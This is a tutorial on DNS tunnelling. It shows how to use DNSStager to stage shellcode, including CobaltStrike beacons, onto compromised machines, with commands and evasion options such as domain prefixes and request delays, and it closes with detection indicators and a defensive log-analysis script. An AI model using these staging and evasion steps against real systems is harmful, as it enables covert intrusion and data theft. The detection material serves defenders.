
Tutorial: How to exfiltrate or execute files in compromised machines with DNS Complete Guide by Blackhat Pakistan 2023

Today we will learn how to exfiltrate or execute files on compromised machines with DNS.

Criminals are constantly changing their modus operandi, using different strategies and techniques to compromise their targets and exfiltrate data from internal networks, even in the most delicate situations. For example, when outbound TCP traffic is blocked by default in a network, communication between a malicious agent installed on a target and its C2 server is not possible. In those scenarios, other network protocols such as ICMP and DNS can be the perfect vehicle to accomplish the hard task of moving internal information past the perimeter.

What is the DNS protocol

The DNS protocol is increasingly being used as a pathway for data exfiltration, including by devices previously infected by threat actors during their malicious activities. DNS tunneling involves sending network traffic over DNS port 53, which is frequently not audited or flagged by network firewalls, even next-generation ones.

Malicious software can use specially crafted requests to take advantage of the DNS protocol and send only well-defined chunks of data in the middle of potentially legitimate DNS traffic. Figure 1 below shows how basic data about a target machine could be transferred between the internal agent and its C2 server on the internet.

Figure 1: Data exfiltration via DNS protocol.

As presented above, the sensitive data can be placed in the middle of a request, either in raw format (1 and 2) or encoded as hexadecimal (3), the best way to avoid characters that are not accepted in DNS names.

In general, the variety of data stolen by criminals may include:

  • Personally identifiable information (PII) such as basic personal details, credit card numbers, social security numbers and so on.
  • Regulated data related to Payment Card Industry Data Security Standard (PCI DSS) and Health Insurance Portability and Accountability Act (HIPAA) compliance.
  • Intellectual property that gives an organization, or the criminals, a competitive advantage.
  • Other sensitive information, including confidential information, documents, contracts, company financials, payroll information, emails and every critical secret.

Ransomware is an excellent way to introduce the subject. The method used by criminals during ransomware attacks has changed: now they use the stolen data to pressure the victims, publishing the secrets on dark web forums to force them to pay the ransom. Criminals exfiltrate the data before encrypting it all.

However, exfiltrating data from internal networks is frequently seen as a big challenge, as security products block TCP traffic. At this point, the DNS protocol can be abused to communicate with the Internet when outbound TCP traffic is not possible by default.


Tutorial: DNSStager

DNSStager is an open-source tool used to hide a malicious payload over DNS, retrieve it via multiple DNS record types such as IPv6 (AAAA) and TXT, and inject the full payload into memory. Instead of only carrying data out of the internal network, we can create a strong channel, like a C2 server, to execute second-stage payloads on the target machine.

In short, DNSStager creates a malicious DNS server that resolves fake requests to AAAA and TXT records. Each response carries a chunk of the payload (fully encoded and encrypted), ready to be used by the DNSStager agent. The tool can generate C or Golang agents, a configuration defined before starting the lab.

Figure 2 shows how DNSStager works and how the server resolves a request.

Figure 2: DNSStager, high-level diagram (source).

In detail, the “client.exe” file illustrated in Figure 2 above is the DNSStager agent created and dropped on the target machine. DNSStager encodes the malicious payload, splits it into chunks, and makes it ready to be resolved by the “client.exe” agent (C or Golang, depending on the nature of the desired scenario).

After receiving all the information via the DNS protocol and bypassing network barriers, the agent injects the final payload into memory and executes the shellcode, which implements process/memory injection techniques.

To get started, the essential steps to run this lab successfully are provided below.

1. DNSStager installation and execution

To install DNSStager, first clone it from the official repository with the following commands, install the requirements, and execute it.

git clone <DNSStager repository URL>
pip install -r requirements.txt
apt install mingw-w64

Figure 3: Banner of DNSStager confirming that it was installed successfully.

2. Configuring the DNS server

The first step is pointing the domain to the DNSStager IP address so that it resolves and handles any DNS request correctly.

For example, controlling a domain called “ ”, we can create a subdomain called “ ” and an “NS” (Name Server) record for it pointing to the host running DNSStager.

Figure 4: Configuration of the DNS name to handle the DNS requests.

As observed in Figure 4, any request coming to the domain will be handled by the DNSStager instance that we are running.

3. DNSStager options

DNSStager is equipped with a lot of functionality.

Figure 5: Options of DNSStager server.

The “--domain” option is used to select the primary domain that handles the DNS requests, in this case “ ”. Also, as a way of bypassing firewalls, the “--prefix” option can be used to add a prefix such as “cdn”. Some examples are presented below.

The other options are described below:

  • --payload: the DNSStager payload “agent” to generate.
  • --output: output path to save the DNSStager executable payload “agent”.
  • --shellcode_path: the raw/bin shellcode path.
  • --xorkey: XOR key to encode the payload with.
  • --sleep: sleep for N seconds between each DNS request.

In addition, the available payloads can be listed using the “--payloads” flag.

Figure 6: DNSStager available payloads.

4. Generate the payload/agent

DNSStager encrypts the payload using a XOR encoder. The XOR key can be specified with the “--xorkey” option.

The complete command can be observed here:

sudo ./ --domain <your-domain> --payload x64/c/ipv6 --output /tmp/a2.exe --prefix cloud-srv- --shellcode_path ~/payload.bin --sleep 1 --xorkey 0x10

Figure 7: Generation of the DNSStager agent.

In addition, a sleep time between each request can be added using the “--sleep” option, a way of evading detection.

5. DNSStager with CobaltStrike beacons

The shellcode used in this scenario can be a CobaltStrike beacon, to take advantage of the range of features provided by this red teaming suite.

Also, instead of using the available DNSStager payloads, we can generate the CobaltStrike payload as demonstrated in Figure 8.

Figure 8: Generation of the DNSStager payload via the CobaltStrike suite.

From this point, we need to generate the agent using the same command shown above, but this time indicating the path of the payload generated via CobaltStrike.

6. Executing the agent

At this moment, we can execute the agent on the target machine, in this case a Windows Server 2019.

Figure 9: CobaltStrike beacon running through DNS using DNSStager.

After executing the agent with the CobaltStrike beacon embedded, we can see the DNS traffic generated between the target machine and the DNSStager server. In detail, a total of 59 DNS AAAA requests were sent to build the final payload. From the security point of view, we can also add some sleep between each request to make this kind of activity less noisy.

Figure 10: DNS request after executing the DNSStager agent.

DNS protocol and how criminals use it

The DNS protocol is a powerful vector abused by criminals in challenging scenarios, because it can break through barriers when no outbound TCP traffic is allowed by default. In this sense, DNS tunneling can be used in a customized way, like C2 infrastructure, to perform malicious activities.

The DNS protocol is a good choice for data exfiltration scenarios and payload execution. According to Check Point, some indicators should be taken into account to detect DNS tunneling, namely:

  • Monitoring domain requests: the data sent during malicious scenarios is encoded within the request name. So, inspecting and monitoring legitimate versus bad traffic is a good way of preventing scenarios of this nature.
  • Use of unusual domains: DNS tunneling works based on DNS names. So, if a high volume of requests is observed to an uncommon domain name, that behavior should generate an alert.
  • High DNS traffic volume: a spike in DNS traffic can be an accurate indicator of DNS tunneling. Because each DNS request has a maximum size of 253 characters, transferring a large payload over DNS requires numerous DNS requests, resulting in abnormal behavior.
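To show the indicators above from the defender's side, here is an added example (not part of the original article or of DNSStager) that scores constructed DNS query log lines for the signs just described: many never-repeated subdomains under one uncommon domain, labels made of hex digits as in Figure 1 (case 3), and lookups concentrated on the AAAA/TXT record types DNSStager uses. The log format, the domain names and the thresholds are assumptions.

```python
import re
from collections import defaultdict
# Constructed sample of DNS query log lines, "client qtype qname". The first
# four mimic a DNSStager-style agent pulling AAAA/TXT chunks from hex-looking
# labels under one uncommon domain; the remaining lines are benign traffic.
SAMPLE_LOG = """\
10.0.0.5 AAAA cloud-srv-4a6f686e20536d697468.example.test
10.0.0.5 AAAA cloud-srv-2c2056503c4120646174.example.test
10.0.0.5 TXT cloud-srv-61207365637265742031.example.test
10.0.0.5 AAAA cloud-srv-0000000000000000000a.example.test
10.0.0.7 A www.wikipedia.org
10.0.0.7 AAAA mail.google.com
10.0.0.9 A cdn.example-corp.net
"""
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")  # a long run of nothing but hex digits

def registered_domain(qname):
    """Crude base domain: the last two labels (enough for this sample)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])

def looks_encoded(label):
    """Hex-encoded chunk label (Figure 1, case 3), possibly behind a --prefix part."""
    return any(HEX_LABEL.match(part) for part in label.lower().split("-"))

def analyse(log_text, min_queries=3):
    """Return {domain: [reasons]} for domains matching the tunnelling indicators."""
    per_domain = defaultdict(lambda: {"queries": 0, "names": set(), "encoded": 0, "chunk_types": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines instead of crashing on them
        _client, qtype, qname = parts
        s = per_domain[registered_domain(qname)]
        s["queries"] += 1
        s["names"].add(qname.lower())
        s["encoded"] += any(looks_encoded(lbl) for lbl in qname.split(".")[:-2])
        s["chunk_types"] += qtype.upper() in ("AAAA", "TXT")  # record types used for chunks
    findings = {}
    for domain, s in per_domain.items():
        if s["queries"] < min_queries:
            continue  # too little traffic to judge
        reasons = [text for hit, text in (
            (len(s["names"]) == s["queries"], "high volume of never-repeated subdomains"),
            (s["encoded"] == s["queries"], "every query carries a hex-encoded label"),
            (s["chunk_types"] == s["queries"], "all lookups are AAAA/TXT records"),
        ) if hit]
        if reasons:
            findings[domain] = reasons
    return findings
```

Run against real resolver logs, the registered_domain helper should be replaced by a public-suffix lookup and the thresholds tuned to the baseline of the network.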

And last but not least, monitoring all network traffic, such as TCP, DNS, ICMP or even the most exotic protocols, gives you a real chance of detecting these kinds of attacks early. So, let’s take this subject seriously.

